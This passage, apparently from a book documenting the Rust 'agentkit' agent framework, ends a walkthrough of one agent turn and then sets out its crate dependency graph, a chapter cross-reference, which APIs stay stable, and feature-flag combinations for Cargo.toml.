Evaluates the ShellPermissionRequest
CommandPolicy has cargo in the allowlist → Allow
The task manager routes it as ForegroundThenDetachAfter(10s)
The command finishes in 3 seconds → result returned immediately
Appends the result

9. Final response

The model sees the successful build output and produces a text response explaining what it changed. The StdoutReporter streams each text chunk to the terminal as it arrives.

10. Turn completion

The model finishes with FinishReason::Completed. The driver returns LoopStep::Finished(TurnResult). The CLI displays the usage summary and waits for the next user input.

The dependency graph in action

User input
  │
  ▼
agentkit-core ──────────── Item, Part, Delta, Usage, FinishReason, identifiers
  │
  ▼
agentkit-loop ──────────── LoopDriver, TurnRequest, LoopStep, AgentEvent
  │
  ├── agentkit-compaction ─ Compactor, StrategyCompactor, CompactionPipeline
  │                         (LoopMutator at AfterToolResult / AfterTurnEnded)
  │
  ├── agentkit-provider-* ─ ModelAdapter → ModelSession → ModelTurn
  │                         (step 4, sends transcript, streams response)
  │
  ├── agentkit-tools-core ─ ToolExecutor, PermissionChecker
  │   │                     (step 6, preflight + execute)
  │   │
  │   ├── agentkit-tool-fs ── ReadFileTool, ReplaceInFileTool
  │   │                       (steps 5, 7)
  │   │
  │   └── agentkit-tool-shell ─ ShellExecTool
  │                              (step 8)
  │
  ├── agentkit-task-manager ── AsyncTaskManager, routing
  │                            (step 8, ForegroundThenDetachAfter)
  │
  └── agentkit-reporting ──── StdoutReporter, UsageReporter
                               (every step, event delivery)

Every crate has a clear, narrow responsibility. The loop coordinates. Tools execute. Permissions gate. Reporters observe. The host decides.

Cross-reference

Each step in the walkthrough above maps to a chapter:

Step	Chapter
1. Input submission	Ch 6: Driving the loop
2. Compaction check	Ch 16: Transcript compaction
3. Turn construction	Ch 5: The model adapter boundary, Ch 15: Prompt caching
4. Model invocation	Ch 1: Talking to models, Ch 4: Streaming
5. Tool call (read)	Ch 11: Filesystem tools
6. Permission check	Ch 10: Permissions
7. Tool call (edit)	Ch 11: Filesystem tools
8. Tool call (shell)	Ch 12: Shell execution, Ch 18: Task management
9. Streaming text	Ch 4: Streaming and deltas, Ch 19: Reporting
10. Turn completion	Ch 6: Driving the loop

Where to go from here

This book has covered the full architecture of an agent system. Some areas for further exploration:

Custom providers — implement adapters for Anthropic, Google, or local model servers using either CompletionsProvider (~50 lines) or the raw traits (~200-500 lines)
Custom tools — database queries, API integrations, code analysis, deployment automation
MCP servers — connect to external tool providers for GitHub, databases, Slack, etc.
Advanced compaction — semantic summarization with a nested agent backend
Multi-agent patterns — tools that spawn sub-agents, parallel agent execution, orchestrator/worker architectures
Production hardening — retry strategies, rate limiting, cost controls, audit logging, persistent sessions

The agentkit crate ecosystem is designed to grow at the edges. The core loop and data model are stable foundations. New tools, providers, and integration patterns can be added without changing the architecture.

Stable (change rarely)	Grows (add freely)
`agentkit-core` types	`agentkit-provider-*` crates
`ModelAdapter` / `ModelSession` traits	`agentkit-tool-*` crates
`LoopDriver` / `LoopStep`	`CompactionStrategy` implementations
`Tool` / `ToolSpec` / `ToolRegistry`	`LoopObserver` implementations
`PermissionChecker` / `PermissionPolicy`	Custom `ContextSource` implementations
`Delta` protocol	MCP server integrations

Example: The examples/ directory in the agentkit repository contains working implementations that exercise every concept in this book, from the simplest chat loop to a full multi-tool coding agent.

Feature flags

The umbrella crate agentkit re-exports subcrates behind feature flags.

Default flags

core — agentkit-core
capabilities — agentkit-capabilities
tools — agentkit-tools-core
task-manager — agentkit-task-manager
loop — agentkit-loop
reporting — agentkit-reporting

Optional flags

compaction — agentkit-compaction
context — agentkit-context
mcp — agentkit-mcp
adapter-completions — agentkit-adapter-completions
provider-anthropic — agentkit-provider-anthropic
provider-cerebras — agentkit-provider-cerebras
provider-groq — agentkit-provider-groq
provider-mistral — agentkit-provider-mistral
provider-ollama — agentkit-provider-ollama
provider-openai — agentkit-provider-openai
provider-openrouter — agentkit-provider-openrouter
provider-vllm — agentkit-provider-vllm
tool-fs — agentkit-tool-fs
tool-shell — agentkit-tool-shell
tool-skills — agentkit-tool-skills
tool-compose — agentkit-tool-compose

Typical combinations

Minimal orchestration:

agentkit = { version = "0.9.0", features = ["core", "capabilities", "tools", "loop"] }

Coding agent:

agentkit = { version = "0.9.0", features = [
    "core", "capabilities", "context", "tools",
    "loop", "tool-fs", "tool-shell", "reporting",
] }

MCP-enabled agent:

agentkit = { version = "0.9.0", features = [
    "core", "capabilities", "context", "tools",
    "loop", "tool-fs", "tool-shell", "reporting", "mcp",
] }

OpenRouter-backed example host (streaming, prompt caching):

agentkit = { version = "0.9.0", features = [
    "core", "capabilities", "tools", "loop",
    "reporting", "provider-openrouter",
] }

OpenAI-compatible provider host (streaming):

agentkit = { version = "0.9.0", features = [
    "core", "capabilities", "tools", "loop",
    "reporting", "provider-groq",
] }

Swap provider-groq for provider-mistral, provider-vllm, provider-ollama, or provider-openai as needed.

Anthropic Messages API host (streaming, extended thinking, server tools):

agentkit = { version = "0.9.0", features = [
    "core", "capabilities", "tools", "loop",
    "reporting", "provider-anthropic",
] }

Cerebras Inference host (streaming, reasoning, rate-limit snapshot):

agentkit = { version = "0.9.0", features = [
    "core", "capabilities", "tools", "loop",
    "reporting", "provider-cerebras",
] }

The agentkit-provider-cerebras crate itself carries granular Cargo features for preview surfaces: compression (msgpack + gzip request bodies), predicted-outputs, service-tiers, batch (Files + Batch API), and an experimental umbrella that pulls in all three preview flags. Enable them on the provider crate directly when you need them — the umbrella provider-cerebras flag wires in the default build.

Keyboard shortcuts

agentkit

Why JSON Schema for input?